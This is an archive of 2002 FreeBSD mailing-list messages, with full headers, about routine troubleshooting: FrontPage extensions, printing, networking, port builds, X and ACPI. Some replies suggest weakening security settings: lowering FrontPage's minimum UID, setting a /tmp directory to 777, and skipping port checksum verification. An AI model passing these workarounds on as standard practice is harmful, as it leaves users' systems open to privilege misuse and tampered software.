2002 08:40:56 -0400 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 In-reply-to: <014c01c21a7b$b59c63a0$020aa8c0@aims.private> Importance: Normal Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Now I am no expert, but this is my understanding of how apache and FrontPage get delivered by the ports system. First of all there are two methods of installing apache & FP. The Apache13-fp port has apache 1.3.26 and FrontPage married together. and this install works right out of the port, as I just installed it last Friday to get the fix for the just announced security hole in apache. The second method is to install 3 separate ports, apache13, mod_frontpage, followed by frontpage-5. I have not been able to get this one to work since the start of the year when mod_frontpage was changed to use APXS. The original poster never stated which method he used, so the solution posted may not be correct for his situation. But maybe you were able to tell from the symptoms. If this is the solution for the mod_frontpage method, then would you please post a bug report with your solution so the mod_frontpage port maintainer can fix the port for everyone. If I am incorrect in my understanding please point it out, as I am always interested in learning more. -----Original Message----- From: owner-freebsd-isp@FreeBSD.ORG [mailto:owner-freebsd-isp@FreeBSD.ORG]On Behalf Of Chris Knight Sent: Sunday, June 23, 2002 2:04 AM To: 'Jeff Tollison' Cc: freebsd-isp@freebsd.org Subject: RE: Frontpage Server Extensions version 5 Howdy, The minimum uid in mod_frontpage has been compiled with a value of 100, and not 80. You're best off doing the following: cd /usr/ports/www/mod_frontpage make clean make configure vi work/mod_frontpage_mirfak-1.6.2/fpexec.h - change FP_UID_MIN from 100 to 80 make FORCE_PKG_REGISTER=yes install FrontPage Extensions should then work correctly. Regards, Chris Knight Systems Administrator AIMS Independent Computer Professionals Tel: +61 3 6334 6664 Fax: +61 3 6331 7032 Mob: +61 419 528 795 Web: http://www.aims.com.au > -----Original Message----- > From: owner-freebsd-isp@FreeBSD.ORG > [mailto:owner-freebsd-isp@FreeBSD.ORG]On Behalf Of Jeff Tollison > Sent: Sunday, 23 June 2002 12:16 > To: freebsd-isp@FreeBSD.ORG > Subject: Frontpage Server Extensions version 5 > > > > I have been beating my head trying to get FP Server Extensions to > work, I have installed a "root web" and "subwebs" and all I > get when I try to edit the website with FP is: > > * The website loads into Frontpage with no password > * web root owned by privileged user: > /usr/local/www/data/_vti_bin/shtml.exe in the server log > > Does anyone have a clue what I might be doing overlooking? > > Thanks in advance for your help > > ---- > Jeff Tollison > The MultiPro Network > jtollison@multipro.com > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-isp" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-isp" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 5:42:53 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail.melim.com.br (salseiros.melim.com.br [200.215.110.23]) by hub.freebsd.org (Postfix) with ESMTP id C2B9437B481 for ; Mon, 24 Jun 2002 05:42:17 -0700 (PDT) Received: from praiadosamores.melim.com.br (praiadosamores.melim.com.br [200.215.110.20]) by mail.melim.com.br (Postfix) with SMTP id 232FEBA30; Mon, 24 Jun 2002 09:42:13 -0300 (BRT) Date: Mon, 24 Jun 2002 09:42:13 -0300 From: Ronan Lucio To: Warren Block Cc: freebsd-questions@FreeBSD.ORG Subject: Re: LPD Error Message-Id: <20020624094213.5a8f01b2.ronanl@melim.com.br> In-Reply-To: References: <20020621164302.7ae843a6.ronanl@melim.com.br> Organization: Melim Internet X-Mailer: Sylpheed version 0.7.4 (GTK+ 1.2.10; i386-portbld-freebsd4.5) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Warren, On Fri, 21 Jun 2002 16:35:29 -0600 (MDT) Warren Block wrote: > On Fri, 21 Jun 2002, Ronan Lucio wrote: > > > I think lpd runs as root > > > > # ps -ajx | grep lpd > > root 100 1 100 c3896500 0 Is ?? 0:00.02 /usr/sbin/lpd -c -l -d > > As of 4.4, it runs as user daemon, group daemon. That may have changed. > I can't tell you why it shows as root above, though. > > > But, if it's wrong, how should I set the users permissions? > > chown -R daemon.daemon /var/spool/output/lpd/spo Thank you very much Warren. I'll do it. Ronan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 6: 7:42 2002 Delivered-To: freebsd-questions@freebsd.org Received: from web13305.mail.yahoo.com (web13305.mail.yahoo.com [216.136.175.41]) by hub.freebsd.org (Postfix) with SMTP id 5B6DC37B404 for ; Mon, 24 Jun 2002 06:07:36 -0700 (PDT) Message-ID: <20020624130736.92984.qmail@web13305.mail.yahoo.com> Received: from [193.123.204.66] by web13305.mail.yahoo.com via HTTP; Mon, 24 Jun 2002 14:07:36 BST Date: Mon, 24 Jun 2002 14:07:36 +0100 (BST) From: =?iso-8859-1?q?Ewan=20Carr?= Subject: Re: vic/sdr - help ! To: mark tinguely , freebsd-questions@FreeBSD.ORG, multimedia@FreeBSD.ORG In-Reply-To: <200206241237.g5OCbJW11488@web.cs.ndsu.nodak.edu> MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG --- mark tinguely wrote: > [...]IP_ADD_MEMBERSHIP > which ethernet adapter are you using? (some cheap > ethernet cards don't > support multicast very well). Ive a LAN consisting of two dell-laptops and am only using xl0 (the ethernet cards on xe0 i dont use in this setup). When I setup my IP address and netmask automatically using DHCP I can run vic (and sdr) no problem BUT when manually configuring my IP address/mask using 'ifconfig....' I get the error I reported in my original mail - its frustrating ! > you can also set a "default multicast route": > > route add 224.0.0.0 -netmask 0xf0000000 -interface > ${hostname} OK, I will try this too. Thanks a lot for your help Mark Ta Ewan __________________________________________________ Do You Yahoo!? Everything you'll ever need on one web page from News and Sport to Email and Music Charts http://uk.my.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 7:10:35 2002 Delivered-To: freebsd-questions@freebsd.org Received: from infinity.aesredfish.net (ns1.aesredfish.net [65.168.0.12]) by hub.freebsd.org (Postfix) with ESMTP id D974B37B404 for ; Mon, 24 Jun 2002 07:10:02 -0700 (PDT) Received: from potentialtech.com (mhope-dhcp-65-168-1-181.dashfast.com [65.168.1.181]) by infinity.aesredfish.net (8.11.6/8.11.0) with ESMTP id g5OE9kr25415; Mon, 24 Jun 2002 10:09:46 -0400 Message-ID: <3D1729A2.4070601@potentialtech.com> Date: Mon, 24 Jun 2002 10:16:02 -0400 From: Bill Moran User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.0rc1) Gecko/20020502 X-Accept-Language: en-us, en MIME-Version: 1.0 To: C Cc: freebsd-questions@freebsd.org Subject: Re: System running from CD References: <20020623230602.9864.CACEROLA@hotpop.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG C wrote: > Hi all. > > Has any of you run your system from a CD? I read somewhere that it is > possible, and that, for security reasons, it is very good, as nothing > can be modified in a CD. And in the case of a root compromise, you just > need to reboot. > > Well, of course, there are some things that need to be modified, which > you can run from a filesystem in RAM ... or something like that. > > And in the case of the compromise you'll need to fix it, of course. > > Have you tried this? Comments welcome. > Thanks. Bye all. Search the list archives for LiveCD. Those scripts will allow you to create a bootable CD like you want. -- Bill Moran Potential Technologies http://www.potentialtech.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 7:15: 2 2002 Delivered-To: freebsd-questions@freebsd.org Received: from highland.isltd.insignia.com (highland.isltd.insignia.com [195.74.141.1]) by hub.freebsd.org (Postfix) with ESMTP id 8D6E637B403 for ; Mon, 24 Jun 2002 07:14:53 -0700 (PDT) Received: from scorpio.isltd.insignia.com (scorpio.isltd.insignia.com [172.16.1.1]) by highland.isltd.insignia.com (8.11.6/8.11.6) with ESMTP id g5OEElw50567 for ; Mon, 24 Jun 2002 15:14:47 +0100 (BST) Received: from exchange-uk.isltd.insignia.com (exchange-uk [172.16.1.6]) by scorpio.isltd.insignia.com (8.11.3/8.11.3) with ESMTP id g5OEEk217630 for ; Mon, 24 Jun 2002 15:14:47 +0100 (BST) Received: by exchange-uk.isltd.insignia.com with Internet Mail Service (5.5.2653.19) id ; Mon, 24 Jun 2002 15:14:46 +0100 Message-ID: <2F03DF3DDE57D411AFF4009027B8C3670289CE4E@exchange-uk.isltd.insignia.com> From: "local.freebsd.questions" To: "'freebsd-questions@freebsd.org'" Subject: Network speed funnies Date: Mon, 24 Jun 2002 15:14:41 +0100 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG We recently replaced an internal Web server, from an old Sparc to a FreeBSD PC, and shortly afterwards got complaints of slow access. Some testing revealed a strange situation: I have two machines, a file server and a web server, the former on 4.3 and the latter on 4.5. The file server is on a 10 Mbit hub and the web server on a 100 Mbit switch. If I telnet into a third FreeBSD machine, on a 100 Mbit connection, and ftp kernel.GENERIC off the two servers, I get about 900 Kb/s for the 10 Mbit one and 8500 Kb/s for the 100 Mbit one. No surprises. However if I do the same from a Windows 2000 box on the same 100 Mbit network I get 900 Kb/s from the server on the slow hub, but for the server on the 100 Mbit connection I get: >ftp> get kernel.GENERIC >200 PORT command successful. >150 Opening BINARY mode data connection for 'kernel.GENERIC' (3648397 bytes). >426 Data connection: Broken pipe. >ftp: 4344 bytes received in 60.10Seconds 0.07Kbytes/sec. The ftpd process on the server keeps going for a while after the client reports the error. The ftpd log shows: >Jun 24 14:59:24 speyburn ftpd[5316]: connection from tomatin (172.16.1.128) >Jun 24 14:59:28 speyburn ftpd[5316]: FTP LOGIN FROM tomatin as jim >Jun 24 15:00:44 speyburn ftpd[5316]: get /kernel.GENERIC = 69632 bytes >Jun 24 15:11:56 speyburn ftpd[5402]: connection from inchgower-e1 (172.16.0.128) >Jun 24 15:12:00 speyburn ftpd[5402]: FTP LOGIN FROM inchgower-e1 as jim >Jun 24 15:12:06 speyburn ftpd[5402]: get /kernel.GENERIC = 3648397 bytes The first is the failed connection, the second a successful one from the FreeBSD client. Note the strange size logged for the file. All four machines have Intel network cards so I don't think it's dodgy hardware. And I can repeat this on other client machines with different hardware. Baffling. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 7:17: 8 2002 Delivered-To: freebsd-questions@freebsd.org Received: from stargate.sse-erfurt.de (stargate.sse-erfurt.de [62.132.15.253]) by hub.freebsd.org (Postfix) with SMTP id 058B437B422 for ; Mon, 24 Jun 2002 07:16:08 -0700 (PDT) Received: (1404 bytes) by stargate.sse-erfurt.de via sendmail with P:stdio/R:inet_hosts/T:smtp (sender: ) id for ; Mon, 24 Jun 2002 16:16:53 +0200 (MET DST) (Smail-3.2.0.101 1997-Dec-17 #7 built DST-Jul-30) Received: from (master [192.105.75.4]) by stargate.sse-erfurt.de via smap (V2.1) id xma013136; Mon, 24 Jun 02 16:16:32 +0200 Received: (from kittler@localhost) by master.sse-erfurt.de (8.9.3/8.9.3/SuSE Linux 8.9.3-0.1) id QAA18914; Mon, 24 Jun 2002 16:15:44 +0200 From: Lutz Kittler MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Message-ID: <15639.10640.343141.857872@master.sse-erfurt.de> Date: Mon, 24 Jun 2002 16:15:44 +0200 (MEST) To: freebsd-questions@freebsd.org Subject: How to install/update firewall X-Mailer: VM 6.75 under 21.1 (patch 7) "Biscayne" XEmacs Lucid Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hi, I have one freebsd-server which updates kernel,userland and ports by cvsupd. There I want to build a new kernel special for the firewall. The kernel and updated userland ( but not all , because I dont need gdb ,...) I want to install on a freebsd-firewall. What is the best way to do it. I dont want to use nfs to share /usr. Is it possible to make installkernel/installworld to other than default directory ? Than I could have a special environment on the server for files I will copy to the firewall. If this is possible how can I restrict building of userland to the files I want to copy to firewall? lutz To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 7:24:54 2002 Delivered-To: freebsd-questions@freebsd.org Received: from dns.perimeter.co.za (dns.perimeter.co.za [196.25.164.254]) by hub.freebsd.org (Postfix) with ESMTP id E74E937B405 for ; Mon, 24 Jun 2002 07:24:41 -0700 (PDT) Received: from PATRICK (loopback.mipjhb [209.212.102.245] (may be forged)) by dns.perimeter.co.za (8.11.1/8.11.1) with SMTP id g5OENmT16307; Mon, 24 Jun 2002 16:23:52 +0200 (SAST) (envelope-from bsd@perimeter.co.za) Message-ID: <01e901c21b8a$6b161000$b50d030a@PATRICK> From: "Patrick O'Reilly" To: , Cc: References: <20020621114848.OBWQ19902.mtiwmhc22.worldnet.att.net@there> <200206212000.02546.dsyphers@uchicago.edu> Subject: Re: trouble with kde startup Date: Mon, 24 Jun 2002 16:21:11 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ----- Original Message ----- From: "David Syphers" Subject: Re: trouble with kde startup > On Thursday 20 June 2002 06:49 pm, AZN Unix wrote: > > when i start up kde it gives me the error message, > > > > There was an error setting up inter-process communications for KDE: The > > message returned by the system was > > Could not read network connection list /home/AZNPideChinese/.DCOPserver__:0 > > please check that the "dcopserver" program is running! > > I had a similar problem, and traced it to the fact that the DCOPserver was trying to open some log file somewhere under /tmp/..... (I think it might have been /tmp/dcopserver, but I can't check right now 'cos that PC is at home) Anyway, I set the perms on that directory to 777, and after that it worked. If you are more security conscious than me you might want to be more careful about this, but 777 is fine for me on a desktop machine. HTH, Regards, Patrick O'Reilly. ___ _ __ / _ )__ __ (_)_ __ ___ _/ /____ __ / __/ -_) _) / ~ ) -_), ,-/ -_) _) /_/ \__/_//_/_/~/_/\__/ \__/\__/_/ http://www.perimeter.co.za To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 7:27:14 2002 Delivered-To: freebsd-questions@freebsd.org Received: from csharp.dyndns.org (pD9552099.dip.t-dialin.net [217.85.32.153]) by hub.freebsd.org (Postfix) with ESMTP id 4513A37B406 for ; Mon, 24 Jun 2002 07:26:40 -0700 (PDT) Received: from mephisto by csharp.dyndns.org with local (Exim 4.05) id 17MUp3-0000Et-00 for freebsd-questions@freebsd.org; Mon, 24 Jun 2002 16:28:05 +0200 Date: Mon, 24 Jun 2002 16:28:05 +0200 From: Christopher Sharp To: freebsd-questions@freebsd.org Subject: www/tidy broken Message-ID: <20020624142805.GA771@web.de> Mail-Followup-To: freebsd-questions@freebsd.org Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.5.1i Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hello, every time I try to install the www/tidy port I get the these errors. Any Ideas ? ===> Extracting for tidy-20000804_1 >> Checksum OK for tidy4aug00.tgz. ===> Patching for tidy-20000804_1 ===> Applying FreeBSD patches for tidy-20000804_1 ===> Configuring for tidy-20000804_1 ===> Building for tidy-20000804_1 cc -O -pipe -D__USE_MISC -c attrs.c In file included from attrs.c:8: html.h:29: syntax error before "c" html.h:180: syntax error before "uint" html.h:285: syntax error before "uint" html.h:299: syntax error before "uint" html.h:302: syntax error before "uint" html.h:317: syntax error before "uint" html.h:324: syntax error before "uint" html.h:331: syntax error before "uint" html.h:367: syntax error before "uint" html.h:385: syntax error before "uint" html.h:425: syntax error before "uint" html.h:432: syntax error before "c" html.h:433: syntax error before "c" html.h:434: syntax error before "c" html.h:507: syntax error before "EntityCode" html.h:507: warning: data definition has no type or storage class html.h:508: syntax error before "n" html.h:537: syntax error before "GetUTF8" html.h:537: syntax error before "uint" html.h:537: warning: data definition has no type or storage class html.h:538: syntax error before "uint" html.h:540: syntax error before "uint" html.h:542: syntax error before "uint" html.h:544: syntax error before "uint" html.h:545: syntax error before "uint" html.h:553: syntax error before "size" html.h:554: syntax error before "uint" html.h:558: syntax error before "ToLower" html.h:558: syntax error before "c" html.h:558: warning: data definition has no type or storage class html.h:570: syntax error before "uint" html.h:687: syntax error before "uint" html.h:688: syntax error before "uint" html.h:689: syntax error before "uint" html.h:690: syntax error before "uint" html.h:691: syntax error before "uint" html.h:698: syntax error before "uint" html.h:709: syntax error before "spaces" html.h:709: warning: data definition has no type or storage class html.h:710: syntax error before "wraplen" html.h:710: warning: data definition has no type or storage class attrs.c:282: syntax error before "uint" attrs.c: In function `install': attrs.c:287: `name' undeclared (first use in this function) attrs.c:287: (Each undeclared identifier is reported only once attrs.c:287: for each function it appears in.) attrs.c:299: `versions' undeclared (first use in this function) attrs.c:300: `attrchk' undeclared (first use in this function) attrs.c: In function `CheckAttribute': attrs.c:491: structure has no member named `versions' attrs.c:498: structure has no member named `versions' attrs.c:504: structure has no member named `versions' attrs.c: In function `CheckAlign': attrs.c:564: structure has no member named `model' attrs.c: In function `CheckValign': attrs.c:599: structure has no member named `model' attrs.c:607: structure has no member named `versions' attrs.c: In function `CheckIMG': attrs.c:659: structure has no member named `versions' attrs.c:664: structure has no member named `badAccess' attrs.c: In function `CheckTableCell': attrs.c:701: structure has no member named `versions' attrs.c: In function `CheckCaption': attrs.c:723: structure has no member named `versions' attrs.c:725: structure has no member named `versions' attrs.c: In function `CheckAREA': attrs.c:768: structure has no member named `badAccess' attrs.c: In function `CheckTABLE': attrs.c:794: structure has no member named `badAccess' *** Error code 1 Stop in /usr/ports/www/tidy/work/tidy4aug00. *** Error code 1 Stop in /usr/ports/www/tidy. -- Any time things appear to be going better, you have overlooked something. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 7:39:51 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mx01-a.netapp.com (mx01-a.netapp.com [198.95.226.53]) by hub.freebsd.org (Postfix) with ESMTP id E7F6237B400 for ; Mon, 24 Jun 2002 07:39:47 -0700 (PDT) Received: from frejya.corp.netapp.com (frejya [10.10.20.91]) by mx01-a.netapp.com (8.12.3/8.12.3/NTAP-1.4) with ESMTP id g5OEdlAg022739 for ; Mon, 24 Jun 2002 07:39:47 -0700 (PDT) Received: from laptop.europe.netapp.com (localhost [127.0.0.1]) by frejya.corp.netapp.com (8.12.2/8.12.2/NTAP-1.4) with ESMTP id g5OEdj42010495; Mon, 24 Jun 2002 07:39:46 -0700 (PDT) Received: from localhost.europe.netapp.com (localhost.europe.netapp.com [127.0.0.1]) by laptop.europe.netapp.com (8.12.3/8.11.1) with ESMTP id g5OEdgfP001527; Mon, 24 Jun 2002 16:39:43 +0200 (CEST) (envelope-from agorski@netapp.com) Subject: xdm not working anymore after upgrade to 4.6-RELEASE From: Achim Gorski To: freebsd-questions@FreeBSD.ORG Cc: Achim Gorski Content-Type: text/plain Content-Transfer-Encoding: 7bit X-Mailer: Ximian Evolution 1.0.5 Date: 24 Jun 2002 16:39:42 +0200 Message-Id: <1024929584.1443.3.camel@laptop.europe.netapp.com> Mime-Version: 1.0 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG After upgrading from 4.5 to 4.6 xdm isn't working anymore. I can start the X server with 'startx'. But xdm fails: ~/.xsession-error: Xlib: connection to ":0.0" refused by server Xlib: Client is not authorized to connect to Server xsetroot: unable to open display ':0' Xlib: connection to ":0.0" refused by server Xlib: Client is not authorized to connect to Server xset: unable to open display ":0" Xlib: connection to ":0.0" refused by server Xlib: Client is not authorized to connect to Server xset: unable to open display ":0" Xlib: connection to ":0.0" refused by server Xlib: Client is not authorized to connect to Server xset: unable to open display ":0" Xlib: connection to ":0.0" refused by server Xlib: Client is not authorized to connect to Server [...] I'm using XFree86-4.2.0_1,1 and trying to load kde 3.0_1. Any ideas? Thanks for helping. Regards, Achim -- Achim Gorski | EMail : agorski@netapp.com Network Appliance GmbH | Phone : +49.(0)2102.2094-28 Vermillionring 5 | Fax : +49.(0)2102.2094-22 D-40878 Ratingen | Hotline: 00800.44.NETAPP (00800.44.638277) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 7:44: 0 2002 Delivered-To: freebsd-questions@freebsd.org Received: from cornell.edu (cornell.edu [132.236.56.6]) by hub.freebsd.org (Postfix) with ESMTP id ADDBB37B401 for ; Mon, 24 Jun 2002 07:43:55 -0700 (PDT) Received: from slack (slack.ornith.cornell.edu [132.236.164.192]) by cornell.edu (8.9.3/8.9.3) with SMTP id KAA09597 for ; Mon, 24 Jun 2002 10:43:55 -0400 (EDT) Message-ID: <00b501c21b8d$8eecd6a0$c0a4ec84@slack> Reply-To: "J. Todd Slack" From: "J. Todd Slack" To: Subject: Java 1.3.1 Date: Mon, 24 Jun 2002 10:43:52 -0400 Organization: Macaulay Library MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_00B2_01C21B6C.07BE86E0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG This is a multi-part message in MIME format. ------=_NextPart_000_00B2_01C21B6C.07BE86E0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Hi, I need Java 1.3.1, Inorder to work from day to day I tried doing a make and I get an error saying not a valid tar file? Here is what I am doing: as Root cd /usr/ports/java/jdk13 make NO_CHECKSUM=3Dyes && make install It starts extracting, finds a few depends and says the are found. Then it says: gtar: This does not look like a tar archive gtar: skipping to next header gtar: Archive contains obsolescent base-64 headers gtar: Error exit delayed from previous errors *** error code 1 Stop in /usr/ports/java/jdk13 I run swing. I have to stay 1.3.1 for now until 1.4 is released on OS X Any thoughts would be appreciated. -Jason ------=_NextPart_000_00B2_01C21B6C.07BE86E0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
Hi,

I need Java 1.3.1, Inorder to work from day to=20 day

 I tried doing a make and I get an error saying not a = valid tar=20 file?

Here is what I am doing:

as Root

cd=20 /usr/ports/java/jdk13
make NO_CHECKSUM=3Dyes && make = install

It=20 starts extracting, finds a few depends and says the are = found.

Then it=20 says:
gtar: This does not look like a tar archive
gtar: skipping = to next=20 header
gtar: Archive contains obsolescent base-64 headers
gtar: = Error exit=20 delayed from previous errors
*** error code 1

Stop in=20 /usr/ports/java/jdk13

I run swing. I have to stay 1.3.1 for now = until 1.4=20 is released on OS X

Any thoughts would be=20 appreciated.

-Jason

------=_NextPart_000_00B2_01C21B6C.07BE86E0-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 8: 2:29 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mx1.ovh.net (b1.ovh.net [213.186.33.51]) by hub.freebsd.org (Postfix) with ESMTP id CBA9E37B400 for ; Mon, 24 Jun 2002 08:02:22 -0700 (PDT) Received: (qmail 13787 invoked by uid 503); 24 Jun 2002 15:01:35 -0000 Received: from unknown (HELO gueway.home) (212.43.212.24) by ns0.ovh.net with DES-CBC3-SHA encrypted SMTP; 24 Jun 2002 15:01:35 -0000 Received: from greatoak.home (greatoak.home [192.168.1.2]) by gueway.home (8.12.2/8.12.2) with ESMTP id g5OF25Tv027663; Mon, 24 Jun 2002 17:02:09 +0200 (CEST) (envelope-from pcasidy@greatoak.home) Message-Id: <200206241502.g5OF25Tv027663@gueway.home> Date: Mon, 24 Jun 2002 17:04:27 +0200 (CEST) From: Philippe CASIDY Subject: Re: Java 1.3.1 To: jts43@cornell.edu Cc: freebsd-questions@freebsd.org In-Reply-To: <00b501c21b8d$8eecd6a0$c0a4ec84@slack> MIME-Version: 1.0 Content-Type: TEXT/plain; charset=us-ascii Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On 24 Jun, J. Todd Slack wrote: > > cd /usr/ports/java/jdk13 > make NO_CHECKSUM=yes && make install > > It starts extracting, finds a few depends and says the are found. > > Then it says: > gtar: This does not look like a tar archive > gtar: skipping to next header > gtar: Archive contains obsolescent base-64 headers > gtar: Error exit delayed from previous errors > *** error code 1 > If you have to set NO_CHECKSUM=yes and gtar wondering about the archive makes me think that the archive you get for jdk13 is not correct. I remember that one has to fetch this port manually. Did you ftp in binary mode? Try to fetch a new one. Phil. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 8: 5: 3 2002 Delivered-To: freebsd-questions@freebsd.org Received: from hog.ipng.nl (hog.colo.bit.nl [193.109.122.227]) by hub.freebsd.org (Postfix) with ESMTP id 0531737B403 for ; Mon, 24 Jun 2002 08:04:57 -0700 (PDT) Received: by hog.ipng.nl (Postfix, from userid 1002) id 6499F457; Mon, 24 Jun 2002 15:04:55 +0000 (GMT) Date: Mon, 24 Jun 2002 17:04:55 +0200 From: Pim van Pelt To: freebsd-questions@freebsd.org Subject: DP1 + acpi(4) + wi(4) Message-ID: <20020624150455.GA48563@hog.ipng.nl> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.3.27i Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hoi, On some particular laptop, which has predominantly SiS chips built in, I have been trying to install FreeBSD ever since 4.0 came out. Every time, the wavelan NIC I own (a Buffalo, Prism-I) gets detected by the pccardd fine, inserted and the MAC adres is found. Any time I try to use the NIC, eg with ``dhclient wi0'', the machine responds with periodic ``wi0: watchdog timeout'' messages. With the 5.0 DP1 version of the kernel, this was no longer the case and the wavelan works like a charm. However, ACPI does not really want to do its thing, and I get errors, slowing the machine to a halt every now and again, even hanging the kernel completely. I thought about disabling ACPI (in /boot/loader.rc, unset acpi_load) and then of course the machine is stable, but the ``wi0: watchdog timeout'' pesters me once more :) Any ideas on which sub-system of the ACPI driverset is responsible for the PCMCIA card working, so I can enable exactly that and keep the rest out of harms way ? Oh, and don't try to run ``acpiconf -s5'' to try and put your laptop to sleep, it will copy memory to disk, apparently starting at cyl/sect 0/0, overwriting your slice happily (thanks, Mitsuru) groet, Pim -- __________________ Met vriendelijke groet, /\ ___/ Pim van Pelt /- \ _/ Business Internet Trends BV PBVP1-RIPE /--- \/ __________________ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 8:27:10 2002 Delivered-To: freebsd-questions@freebsd.org Received: from tbaytel.net (tbaytel3.tbaytel.net [206.47.150.179]) by hub.freebsd.org (Postfix) with ESMTP id 46A1337B400 for ; Mon, 24 Jun 2002 08:27:05 -0700 (PDT) Received: from sol (vickesh01-1376.tbaytel.net [204.50.183.176]) by tbaytel.net (8.11.2/) with SMTP id g5OFR1823588 for ; Mon, 24 Jun 2002 11:27:02 -0400 Message-ID: <00be01c21b93$d841d250$7f0ea8c0@sol> Reply-To: "Justin P. Michel" From: "Justin P. Michel" To: Subject: Proper Driver for Network Card: Realtek 8019AS Date: Mon, 24 Jun 2002 11:28:46 -0400 Organization: J Continuum MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 